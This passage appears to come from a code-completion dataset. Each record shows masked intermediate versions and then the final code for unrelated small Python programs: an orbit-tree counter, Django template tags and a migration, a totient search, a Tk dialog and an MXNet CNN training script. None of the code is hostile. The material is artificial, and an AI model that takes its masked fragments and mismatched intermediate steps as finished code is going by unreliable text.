"step-1": "<mask token>\n\n\nclass Obj:\n\n def __init__(self, name):\n self.name = name\n self.down = []\n\n def add_child(self, obj):\n self.down.append(obj)\n\n def prnt(self, prev):\n if not self.down:\n print(prev + '=' + self.name)\n else:\n for d in self.down:\n d.prnt(prev + '-' + self.name)\n\n def distance(self, start):\n d = start\n if not self.down:\n print(self.name, start)\n for n in self.down:\n d += n.distance(start + 1)\n return d\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Obj:\n\n def __init__(self, name):\n self.name = name\n self.down = []\n\n def add_child(self, obj):\n self.down.append(obj)\n\n def prnt(self, prev):\n if not self.down:\n print(prev + '=' + self.name)\n else:\n for d in self.down:\n d.prnt(prev + '-' + self.name)\n\n def distance(self, start):\n d = start\n if not self.down:\n print(self.name, start)\n for n in self.down:\n d += n.distance(start + 1)\n return d\n\n\n<mask token>\nfor c, o in effects:\n obj = None\n if o in orbits:\n obj = orbits[o]\n else:\n obj = Obj(o)\n orbits[o] = obj\n if c in orbits:\n orbits[c].add_child(obj)\n else:\n ctr = Obj(c)\n ctr.add_child(obj)\n orbits[c] = ctr\nprint(COM.distance(0))\n",
"step-3": "<mask token>\n\n\nclass Obj:\n\n def __init__(self, name):\n self.name = name\n self.down = []\n\n def add_child(self, obj):\n self.down.append(obj)\n\n def prnt(self, prev):\n if not self.down:\n print(prev + '=' + self.name)\n else:\n for d in self.down:\n d.prnt(prev + '-' + self.name)\n\n def distance(self, start):\n d = start\n if not self.down:\n print(self.name, start)\n for n in self.down:\n d += n.distance(start + 1)\n return d\n\n\nCOM = Obj('COM')\norbits = {}\norbits['COM'] = COM\neffects = [x.strip().split(')') for x in list(sys.stdin)]\nfor c, o in effects:\n obj = None\n if o in orbits:\n obj = orbits[o]\n else:\n obj = Obj(o)\n orbits[o] = obj\n if c in orbits:\n orbits[c].add_child(obj)\n else:\n ctr = Obj(c)\n ctr.add_child(obj)\n orbits[c] = ctr\nprint(COM.distance(0))\n",
"step-4": "import sys\n\n\nclass Obj:\n\n def __init__(self, name):\n self.name = name\n self.down = []\n\n def add_child(self, obj):\n self.down.append(obj)\n\n def prnt(self, prev):\n if not self.down:\n print(prev + '=' + self.name)\n else:\n for d in self.down:\n d.prnt(prev + '-' + self.name)\n\n def distance(self, start):\n d = start\n if not self.down:\n print(self.name, start)\n for n in self.down:\n d += n.distance(start + 1)\n return d\n\n\nCOM = Obj('COM')\norbits = {}\norbits['COM'] = COM\neffects = [x.strip().split(')') for x in list(sys.stdin)]\nfor c, o in effects:\n obj = None\n if o in orbits:\n obj = orbits[o]\n else:\n obj = Obj(o)\n orbits[o] = obj\n if c in orbits:\n orbits[c].add_child(obj)\n else:\n ctr = Obj(c)\n ctr.add_child(obj)\n orbits[c] = ctr\nprint(COM.distance(0))\n",
"step-5": null,
"step-ids": [
5,
6,
7,
8
]
}
|
[
5,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@register.filter
def jsonify(object):
return mark_safe(json.dumps(object, cls=DjangoJSONEncoder))
@register.simple_tag
def get_crop_url(crop, width=None, scale=1):
if width:
return crop.url_at_width(width * scale)
else:
return crop.url_at_width(crop.width * scale)
@register.assignment_tag
def get_available_crop_scales(crop, width):
return crop.available_scales(width=width)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
register = template.Library()
@register.filter
def jsonify(object):
return mark_safe(json.dumps(object, cls=DjangoJSONEncoder))
@register.simple_tag
def get_crop_url(crop, width=None, scale=1):
if width:
return crop.url_at_width(width * scale)
else:
return crop.url_at_width(crop.width * scale)
@register.assignment_tag
def get_available_crop_scales(crop, width):
return crop.available_scales(width=width)
<|reserved_special_token_1|>
import json
from django import template
from django.core.serializers.json import DjangoJSONEncoder
from django.utils.safestring import mark_safe
register = template.Library()
@register.filter
def jsonify(object):
return mark_safe(json.dumps(object, cls=DjangoJSONEncoder))
@register.simple_tag
def get_crop_url(crop, width=None, scale=1):
if width:
return crop.url_at_width(width * scale)
else:
return crop.url_at_width(crop.width * scale)
@register.assignment_tag
def get_available_crop_scales(crop, width):
return crop.available_scales(width=width)
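# Template-side usage sketch (after loading this tag library with {% load %}):
#
#     <script>var ctx = {{ context_data|jsonify }};</script>
#     <img src="{% get_crop_url crop 300 2 %}">
#     {% get_available_crop_scales crop 300 as scales %}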
|
flexible
|
{
"blob_id": "987579da6b7ae208a66e375e0c9eca32b97199c5",
"index": 4704,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\n@register.filter\ndef jsonify(object):\n return mark_safe(json.dumps(object, cls=DjangoJSONEncoder))\n\n\n@register.simple_tag\ndef get_crop_url(crop, width=None, scale=1):\n if width:\n return crop.url_at_width(width * scale)\n else:\n return crop.url_at_width(crop.width * scale)\n\n\n@register.assignment_tag\ndef get_available_crop_scales(crop, width):\n return crop.available_scales(width=width)\n",
"step-3": "<mask token>\nregister = template.Library()\n\n\n@register.filter\ndef jsonify(object):\n return mark_safe(json.dumps(object, cls=DjangoJSONEncoder))\n\n\n@register.simple_tag\ndef get_crop_url(crop, width=None, scale=1):\n if width:\n return crop.url_at_width(width * scale)\n else:\n return crop.url_at_width(crop.width * scale)\n\n\n@register.assignment_tag\ndef get_available_crop_scales(crop, width):\n return crop.available_scales(width=width)\n",
"step-4": "import json\nfrom django import template\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.utils.safestring import mark_safe\nregister = template.Library()\n\n\n@register.filter\ndef jsonify(object):\n return mark_safe(json.dumps(object, cls=DjangoJSONEncoder))\n\n\n@register.simple_tag\ndef get_crop_url(crop, width=None, scale=1):\n if width:\n return crop.url_at_width(width * scale)\n else:\n return crop.url_at_width(crop.width * scale)\n\n\n@register.assignment_tag\ndef get_available_crop_scales(crop, width):\n return crop.available_scales(width=width)\n",
"step-5": null,
"step-ids": [
0,
3,
4,
5
]
}
|
[
0,
3,
4,
5
] |
def phi(n):
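    # Euler's totient by trial division: for each distinct prime factor d,
    # apply p *= (1 - 1/d), implemented here as p -= int(p/d), then strip
    # every power of d out of the remaining cofactor r.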
r = n
d = 2
p = n
while r > 1:
if r % d == 0:
            p -= int(p/d)
while r % d == 0:
r = int(r/d)
d += 1
return p
m = (0, 1)
for n in range(2, 1000000):
p = phi(n)
m = max(m, (n/p, n))
if n % 10000 == 0:
print(n)
print(m)
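# This is the Project Euler 69 search (maximize n/phi(n) for n below 1e6);
# the ratio is largest for primorials, so the winner is 2*3*5*7*11*13*17 = 510510.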
|
normal
|
{
"blob_id": "e4f97018567559fc2714b75654974fb7c51f770f",
"index": 5266,
"step-1": "<mask token>\n",
"step-2": "def phi(n):\n r = n\n d = 2\n p = n\n while r > 1:\n if r % d == 0:\n p -= int(r / d)\n while r % d == 0:\n r = int(r / d)\n d += 1\n return p\n\n\n<mask token>\n",
"step-3": "def phi(n):\n r = n\n d = 2\n p = n\n while r > 1:\n if r % d == 0:\n p -= int(r / d)\n while r % d == 0:\n r = int(r / d)\n d += 1\n return p\n\n\n<mask token>\nfor n in range(2, 1000000):\n p = phi(n)\n m = max(m, (n / p, n))\n if n % 10000 == 0:\n print(n)\nprint(m)\n",
"step-4": "def phi(n):\n r = n\n d = 2\n p = n\n while r > 1:\n if r % d == 0:\n p -= int(r / d)\n while r % d == 0:\n r = int(r / d)\n d += 1\n return p\n\n\nm = 0, 1\nfor n in range(2, 1000000):\n p = phi(n)\n m = max(m, (n / p, n))\n if n % 10000 == 0:\n print(n)\nprint(m)\n",
"step-5": "def phi(n):\n r = n\n d = 2\n p = n\n while r > 1:\n if r % d == 0:\n p -= int(r/d)\n while r % d == 0:\n r = int(r/d)\n d += 1\n return p\n\nm = (0, 1)\nfor n in range(2, 1000000):\n p = phi(n)\n m = max(m, (n/p, n))\n if n % 10000 == 0:\n print(n)\n\nprint(m)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Generated by Django 3.1.2 on 2020-10-25 01:19
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('jobs', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='job',
name='link',
field=models.URLField(null=True),
),
migrations.AddField(
model_name='job',
name='title',
field=models.CharField(default=datetime.date(2020, 10, 25), max_length=200),
preserve_default=False,
),
]
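    # preserve_default=False records that the date above was only a one-off
    # default Django asked for when adding the non-nullable 'title' column to
    # existing rows; it is not kept as the field's default afterwards.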
|
normal
|
{
"blob_id": "562888201719456ed2f3c32e81ffd7d2c39dabc3",
"index": 7303,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('jobs', '0001_initial')]\n operations = [migrations.AddField(model_name='job', name='link', field=\n models.URLField(null=True)), migrations.AddField(model_name='job',\n name='title', field=models.CharField(default=datetime.date(2020, 10,\n 25), max_length=200), preserve_default=False)]\n",
"step-4": "import datetime\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('jobs', '0001_initial')]\n operations = [migrations.AddField(model_name='job', name='link', field=\n models.URLField(null=True)), migrations.AddField(model_name='job',\n name='title', field=models.CharField(default=datetime.date(2020, 10,\n 25), max_length=200), preserve_default=False)]\n",
"step-5": "# Generated by Django 3.1.2 on 2020-10-25 01:19\n\nimport datetime\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('jobs', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='job',\n name='link',\n field=models.URLField(null=True),\n ),\n migrations.AddField(\n model_name='job',\n name='title',\n field=models.CharField(default=datetime.date(2020, 10, 25), max_length=200),\n preserve_default=False,\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import boring.dialog
import boring.form
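# boring.form layout mini-DSL (inferred from the string below): one field per
# line as "Label@type"; "|" appears to place two fields on the same row, as
# with Width/Height here.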
FORMSTRING = '''
Project name@string
Width@int|Height@int
Background color@color
Fullscreen@check
'''
class NewProjectWindow(boring.dialog.DefaultDialog):
def __init__(self, master, _dict=None):
self._dict = _dict
self.output = None
boring.dialog.DefaultDialog.__init__(self, master)
def body(self, master):
initial_values = [
'',
640, 480,
'#dadada',
False
]
if self._dict:
initial_values = [
self._dict.get('name'),
self._dict.get('width'), self._dict.get('height'),
self._dict.get('bgcolor'),
self._dict.get('fullscreen')
]
self.form = boring.form.FormFrame(master, FORMSTRING, initial_values=initial_values, title='%s Project' % ('Edit' if self._dict else 'New'))
self.form.grid(pady=10, padx=10)
return self.form.inputs[0]
def apply(self):
'''
called when ok button is pressed
'''
self.output = {
'name': self.form.values[0],
'width': self.form.values[1],
'height': self.form.values[2],
'bgcolor': self.form.values[3],
'fullscreen': self.form.values[4]
}
def validate(self):
width = self.form.values[1]
height = self.form.values[2]
if width <= 0 or height <= 0:
boring.dialog.MessageBox.warning(parent=self,
title='Wrong data',
message='Invalid width/height')
return False
if not self.form.values[0]:
boring.dialog.MessageBox.warning(parent=self,
title='Project title',
message='Invalid project name')
return False
return True
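# Rough usage sketch (assumes a Tk master widget named `root`; hypothetical):
#
#     win = NewProjectWindow(root)              # modal "New Project" dialog
#     if win.output is not None:                # None when the user cancelled
#         print(win.output['name'], win.output['width'], win.output['height'])
#
#     NewProjectWindow(root, _dict=win.output)  # reopen prefilled, as "Edit"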
|
normal
|
{
"blob_id": "76420ec1b37d4b9b85f35764a7f8a0e1f19a15dd",
"index": 5745,
"step-1": "<mask token>\n\n\nclass NewProjectWindow(boring.dialog.DefaultDialog):\n\n def __init__(self, master, _dict=None):\n self._dict = _dict\n self.output = None\n boring.dialog.DefaultDialog.__init__(self, master)\n <mask token>\n\n def apply(self):\n \"\"\"\n called when ok button is pressed\n \"\"\"\n self.output = {'name': self.form.values[0], 'width': self.form.\n values[1], 'height': self.form.values[2], 'bgcolor': self.form.\n values[3], 'fullscreen': self.form.values[4]}\n\n def validate(self):\n width = self.form.values[1]\n height = self.form.values[2]\n if width <= 0 or height <= 0:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Wrong data', message='Invalid width/height')\n return False\n if not self.form.values[0]:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Project title', message='Invalid project name')\n return False\n return True\n",
"step-2": "<mask token>\n\n\nclass NewProjectWindow(boring.dialog.DefaultDialog):\n\n def __init__(self, master, _dict=None):\n self._dict = _dict\n self.output = None\n boring.dialog.DefaultDialog.__init__(self, master)\n\n def body(self, master):\n initial_values = ['', 640, 480, '#dadada', False]\n if self._dict:\n initial_values = [self._dict.get('name'), self._dict.get(\n 'width'), self._dict.get('height'), self._dict.get(\n 'bgcolor'), self._dict.get('fullscreen')]\n self.form = boring.form.FormFrame(master, FORMSTRING,\n initial_values=initial_values, title='%s Project' % ('Edit' if\n self._dict else 'New'))\n self.form.grid(pady=10, padx=10)\n return self.form.inputs[0]\n\n def apply(self):\n \"\"\"\n called when ok button is pressed\n \"\"\"\n self.output = {'name': self.form.values[0], 'width': self.form.\n values[1], 'height': self.form.values[2], 'bgcolor': self.form.\n values[3], 'fullscreen': self.form.values[4]}\n\n def validate(self):\n width = self.form.values[1]\n height = self.form.values[2]\n if width <= 0 or height <= 0:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Wrong data', message='Invalid width/height')\n return False\n if not self.form.values[0]:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Project title', message='Invalid project name')\n return False\n return True\n",
"step-3": "<mask token>\nFORMSTRING = \"\"\"\nProject name@string\nWidth@int|Height@int\nBackground color@color\nFullscreen@check\n\"\"\"\n\n\nclass NewProjectWindow(boring.dialog.DefaultDialog):\n\n def __init__(self, master, _dict=None):\n self._dict = _dict\n self.output = None\n boring.dialog.DefaultDialog.__init__(self, master)\n\n def body(self, master):\n initial_values = ['', 640, 480, '#dadada', False]\n if self._dict:\n initial_values = [self._dict.get('name'), self._dict.get(\n 'width'), self._dict.get('height'), self._dict.get(\n 'bgcolor'), self._dict.get('fullscreen')]\n self.form = boring.form.FormFrame(master, FORMSTRING,\n initial_values=initial_values, title='%s Project' % ('Edit' if\n self._dict else 'New'))\n self.form.grid(pady=10, padx=10)\n return self.form.inputs[0]\n\n def apply(self):\n \"\"\"\n called when ok button is pressed\n \"\"\"\n self.output = {'name': self.form.values[0], 'width': self.form.\n values[1], 'height': self.form.values[2], 'bgcolor': self.form.\n values[3], 'fullscreen': self.form.values[4]}\n\n def validate(self):\n width = self.form.values[1]\n height = self.form.values[2]\n if width <= 0 or height <= 0:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Wrong data', message='Invalid width/height')\n return False\n if not self.form.values[0]:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Project title', message='Invalid project name')\n return False\n return True\n",
"step-4": "import boring.dialog\nimport boring.form\nFORMSTRING = \"\"\"\nProject name@string\nWidth@int|Height@int\nBackground color@color\nFullscreen@check\n\"\"\"\n\n\nclass NewProjectWindow(boring.dialog.DefaultDialog):\n\n def __init__(self, master, _dict=None):\n self._dict = _dict\n self.output = None\n boring.dialog.DefaultDialog.__init__(self, master)\n\n def body(self, master):\n initial_values = ['', 640, 480, '#dadada', False]\n if self._dict:\n initial_values = [self._dict.get('name'), self._dict.get(\n 'width'), self._dict.get('height'), self._dict.get(\n 'bgcolor'), self._dict.get('fullscreen')]\n self.form = boring.form.FormFrame(master, FORMSTRING,\n initial_values=initial_values, title='%s Project' % ('Edit' if\n self._dict else 'New'))\n self.form.grid(pady=10, padx=10)\n return self.form.inputs[0]\n\n def apply(self):\n \"\"\"\n called when ok button is pressed\n \"\"\"\n self.output = {'name': self.form.values[0], 'width': self.form.\n values[1], 'height': self.form.values[2], 'bgcolor': self.form.\n values[3], 'fullscreen': self.form.values[4]}\n\n def validate(self):\n width = self.form.values[1]\n height = self.form.values[2]\n if width <= 0 or height <= 0:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Wrong data', message='Invalid width/height')\n return False\n if not self.form.values[0]:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Project title', message='Invalid project name')\n return False\n return True\n",
"step-5": "import boring.dialog\nimport boring.form\n\nFORMSTRING = '''\nProject name@string\nWidth@int|Height@int\nBackground color@color\nFullscreen@check\n'''\n\nclass NewProjectWindow(boring.dialog.DefaultDialog):\n def __init__(self, master, _dict=None):\n self._dict = _dict\n self.output = None\n boring.dialog.DefaultDialog.__init__(self, master)\n\n def body(self, master):\n initial_values = [\n '',\n 640, 480,\n '#dadada',\n False\n ]\n if self._dict:\n initial_values = [\n self._dict.get('name'),\n self._dict.get('width'), self._dict.get('height'),\n self._dict.get('bgcolor'),\n self._dict.get('fullscreen')\n ]\n self.form = boring.form.FormFrame(master, FORMSTRING, initial_values=initial_values, title='%s Project' % ('Edit' if self._dict else 'New'))\n self.form.grid(pady=10, padx=10)\n\n return self.form.inputs[0]\n\n def apply(self):\n '''\n called when ok button is pressed\n '''\n self.output = {\n 'name': self.form.values[0],\n 'width': self.form.values[1],\n 'height': self.form.values[2],\n 'bgcolor': self.form.values[3],\n 'fullscreen': self.form.values[4]\n }\n\n def validate(self):\n width = self.form.values[1]\n height = self.form.values[2]\n if width <= 0 or height <= 0:\n boring.dialog.MessageBox.warning(parent=self,\n title='Wrong data',\n message='Invalid width/height')\n return False\n if not self.form.values[0]:\n boring.dialog.MessageBox.warning(parent=self,\n title='Project title',\n message='Invalid project name')\n return False\n return True",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
import mxnet as mx
import numpy as np
import logging
# Example performance:
# INFO:root:Epoch[34] Train-accuracy=0.601388
# INFO:root:Epoch[34] Validation-accuracy=0.620949
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
# running device
dev = mx.gpu()
# batch size and input shape
batch_size = 64
data_shape = (3, 36, 36)
# training data info for learning rate reduction
num_examples = 20000
epoch_size = num_examples // batch_size  # integer division so the scheduler step stays an int
lr_factor_epoch = 15
# model saving parameter
model_prefix = "./models/sample_net"
# train data iterator
train = mx.io.ImageRecordIter(
path_imgrec = "tr.rec",
mean_r = 128,
mean_g = 128,
mean_b = 128,
scale = 0.0078125,
max_aspect_ratio = 0.35,
data_shape = data_shape,
batch_size = batch_size,
rand_crop = True,
rand_mirror = True)
# validate data iterator
val = mx.io.ImageRecordIter(
path_imgrec = "va.rec",
mean_r = 128,
mean_b = 128,
mean_g = 128,
scale = 0.0078125,
rand_crop = False,
rand_mirror = False,
data_shape = data_shape,
batch_size = batch_size)
# network definition
# stage 1
net = mx.sym.Variable("data")
net = mx.sym.Convolution(data=net, kernel=(5, 5), num_filter=32, pad=(2, 2))
net = mx.sym.Activation(data=net, act_type="relu")
net = mx.sym.Convolution(data=net, kernel=(5, 5), num_filter=64, pad=(2, 2))
net = mx.sym.Activation(data=net, act_type="relu")
net = mx.sym.Pooling(data=net, pool_type="max", kernel=(3, 3), stride=(2, 2))
# stage 2
net = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=64, pad=(1, 1))
net = mx.sym.Activation(data=net, act_type="relu")
net = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=64, pad=(1, 1))
net = mx.sym.Activation(data=net, act_type="relu")
net = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=128, pad=(1, 1))
net = mx.sym.Activation(data=net, act_type="relu")
net = mx.sym.Pooling(data=net, pool_type="max", kernel=(3, 3), stride=(2, 2))
# stage 3
net = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=256, pad=(1, 1))
net = mx.sym.Activation(data=net, act_type="relu")
net = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=256, pad=(1, 1))
net = mx.sym.Activation(data=net, act_type="relu")
net = mx.sym.Pooling(data=net, pool_type="avg", kernel=(9, 9), stride=(1, 1))
# stage 4
net = mx.sym.Flatten(data=net)
net = mx.sym.Dropout(data=net, p=0.25)
net = mx.sym.FullyConnected(data=net, num_hidden=121)
net = mx.symbol.SoftmaxOutput(data=net, name='softmax')
# Model parameter
# This model will reduce learning rate by factor 0.1 for every 15 epoch
model = mx.model.FeedForward(
ctx = dev,
symbol = net,
num_epoch = 35,
learning_rate = 0.01,
momentum = 0.9,
wd = 0.0001,
clip_gradient = 5,
lr_scheduler = mx.lr_scheduler.FactorScheduler(step=epoch_size * lr_factor_epoch, factor = 0.1),
initializer = mx.init.Xavier(factor_type="in", magnitude=2.34))
# fit the model
model.fit(
X = train,
eval_data = val,
batch_end_callback = mx.callback.Speedometer(batch_size, 50),
epoch_end_callback = mx.callback.do_checkpoint(model_prefix))
|
normal
|
{
"blob_id": "e82b9aa0f7dc669b3d5622c093b766c7e168221c",
"index": 5757,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nlogger.setLevel(logging.DEBUG)\n<mask token>\nmodel.fit(X=train, eval_data=val, batch_end_callback=mx.callback.\n Speedometer(batch_size, 50), epoch_end_callback=mx.callback.\n do_checkpoint(model_prefix))\n",
"step-3": "<mask token>\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\ndev = mx.gpu()\nbatch_size = 64\ndata_shape = 3, 36, 36\nnum_examples = 20000\nepoch_size = num_examples / batch_size\nlr_factor_epoch = 15\nmodel_prefix = './models/sample_net'\ntrain = mx.io.ImageRecordIter(path_imgrec='tr.rec', mean_r=128, mean_g=128,\n mean_b=128, scale=0.0078125, max_aspect_ratio=0.35, data_shape=\n data_shape, batch_size=batch_size, rand_crop=True, rand_mirror=True)\nval = mx.io.ImageRecordIter(path_imgrec='va.rec', mean_r=128, mean_b=128,\n mean_g=128, scale=0.0078125, rand_crop=False, rand_mirror=False,\n data_shape=data_shape, batch_size=batch_size)\nnet = mx.sym.Variable('data')\nnet = mx.sym.Convolution(data=net, kernel=(5, 5), num_filter=32, pad=(2, 2))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Convolution(data=net, kernel=(5, 5), num_filter=64, pad=(2, 2))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Pooling(data=net, pool_type='max', kernel=(3, 3), stride=(2, 2))\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=64, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=64, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=128, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Pooling(data=net, pool_type='max', kernel=(3, 3), stride=(2, 2))\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=256, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=256, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Pooling(data=net, pool_type='avg', kernel=(9, 9), stride=(1, 1))\nnet = mx.sym.Flatten(data=net)\nnet = mx.sym.Dropout(data=net, p=0.25)\nnet = mx.sym.FullyConnected(data=net, num_hidden=121)\nnet = mx.symbol.SoftmaxOutput(data=net, name='softmax')\nmodel = mx.model.FeedForward(ctx=dev, symbol=net, num_epoch=35,\n learning_rate=0.01, momentum=0.9, wd=0.0001, clip_gradient=5,\n lr_scheduler=mx.lr_scheduler.FactorScheduler(step=epoch_size *\n lr_factor_epoch, factor=0.1), initializer=mx.init.Xavier(factor_type=\n 'in', magnitude=2.34))\nmodel.fit(X=train, eval_data=val, batch_end_callback=mx.callback.\n Speedometer(batch_size, 50), epoch_end_callback=mx.callback.\n do_checkpoint(model_prefix))\n",
"step-4": "import mxnet as mx\nimport numpy as np\nimport logging\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\ndev = mx.gpu()\nbatch_size = 64\ndata_shape = 3, 36, 36\nnum_examples = 20000\nepoch_size = num_examples / batch_size\nlr_factor_epoch = 15\nmodel_prefix = './models/sample_net'\ntrain = mx.io.ImageRecordIter(path_imgrec='tr.rec', mean_r=128, mean_g=128,\n mean_b=128, scale=0.0078125, max_aspect_ratio=0.35, data_shape=\n data_shape, batch_size=batch_size, rand_crop=True, rand_mirror=True)\nval = mx.io.ImageRecordIter(path_imgrec='va.rec', mean_r=128, mean_b=128,\n mean_g=128, scale=0.0078125, rand_crop=False, rand_mirror=False,\n data_shape=data_shape, batch_size=batch_size)\nnet = mx.sym.Variable('data')\nnet = mx.sym.Convolution(data=net, kernel=(5, 5), num_filter=32, pad=(2, 2))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Convolution(data=net, kernel=(5, 5), num_filter=64, pad=(2, 2))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Pooling(data=net, pool_type='max', kernel=(3, 3), stride=(2, 2))\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=64, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=64, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=128, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Pooling(data=net, pool_type='max', kernel=(3, 3), stride=(2, 2))\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=256, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=256, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Pooling(data=net, pool_type='avg', kernel=(9, 9), stride=(1, 1))\nnet = mx.sym.Flatten(data=net)\nnet = mx.sym.Dropout(data=net, p=0.25)\nnet = mx.sym.FullyConnected(data=net, num_hidden=121)\nnet = mx.symbol.SoftmaxOutput(data=net, name='softmax')\nmodel = mx.model.FeedForward(ctx=dev, symbol=net, num_epoch=35,\n learning_rate=0.01, momentum=0.9, wd=0.0001, clip_gradient=5,\n lr_scheduler=mx.lr_scheduler.FactorScheduler(step=epoch_size *\n lr_factor_epoch, factor=0.1), initializer=mx.init.Xavier(factor_type=\n 'in', magnitude=2.34))\nmodel.fit(X=train, eval_data=val, batch_end_callback=mx.callback.\n Speedometer(batch_size, 50), epoch_end_callback=mx.callback.\n do_checkpoint(model_prefix))\n",
"step-5": "import mxnet as mx\nimport numpy as np\nimport logging\n\n# Example performance:\n# INFO:root:Epoch[34] Train-accuracy=0.601388\n# INFO:root:Epoch[34] Validation-accuracy=0.620949\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\n\n# running device\ndev = mx.gpu()\n# batch size and input shape\nbatch_size = 64\ndata_shape = (3, 36, 36)\n# training data info for learning rate reduction\nnum_examples = 20000\nepoch_size = num_examples / batch_size\nlr_factor_epoch = 15\n# model saving parameter\nmodel_prefix = \"./models/sample_net\"\n\n# train data iterator\ntrain = mx.io.ImageRecordIter(\n path_imgrec = \"tr.rec\",\n mean_r = 128,\n mean_g = 128,\n mean_b = 128,\n scale = 0.0078125,\n max_aspect_ratio = 0.35,\n data_shape = data_shape,\n batch_size = batch_size,\n rand_crop = True,\n rand_mirror = True)\n\n# validate data iterator\nval = mx.io.ImageRecordIter(\n path_imgrec = \"va.rec\",\n mean_r = 128,\n mean_b = 128,\n mean_g = 128,\n scale = 0.0078125,\n rand_crop = False,\n rand_mirror = False,\n data_shape = data_shape,\n batch_size = batch_size)\n\n# network definition\n# stage 1\nnet = mx.sym.Variable(\"data\")\nnet = mx.sym.Convolution(data=net, kernel=(5, 5), num_filter=32, pad=(2, 2))\nnet = mx.sym.Activation(data=net, act_type=\"relu\")\nnet = mx.sym.Convolution(data=net, kernel=(5, 5), num_filter=64, pad=(2, 2))\nnet = mx.sym.Activation(data=net, act_type=\"relu\")\nnet = mx.sym.Pooling(data=net, pool_type=\"max\", kernel=(3, 3), stride=(2, 2))\n# stage 2\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=64, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type=\"relu\")\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=64, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type=\"relu\")\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=128, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type=\"relu\")\nnet = mx.sym.Pooling(data=net, pool_type=\"max\", kernel=(3, 3), stride=(2, 2))\n# stage 3\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=256, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type=\"relu\")\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=256, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type=\"relu\")\nnet = mx.sym.Pooling(data=net, pool_type=\"avg\", kernel=(9, 9), stride=(1, 1))\n# stage 4\nnet = mx.sym.Flatten(data=net)\nnet = mx.sym.Dropout(data=net, p=0.25)\nnet = mx.sym.FullyConnected(data=net, num_hidden=121)\nnet = mx.symbol.SoftmaxOutput(data=net, name='softmax')\n\n# Model parameter\n# This model will reduce learning rate by factor 0.1 for every 15 epoch\nmodel = mx.model.FeedForward(\n ctx = dev,\n symbol = net,\n num_epoch = 35,\n learning_rate = 0.01,\n momentum = 0.9,\n wd = 0.0001,\n clip_gradient = 5,\n lr_scheduler = mx.lr_scheduler.FactorScheduler(step=epoch_size * lr_factor_epoch, factor = 0.1),\n initializer = mx.init.Xavier(factor_type=\"in\", magnitude=2.34))\n\n# fit 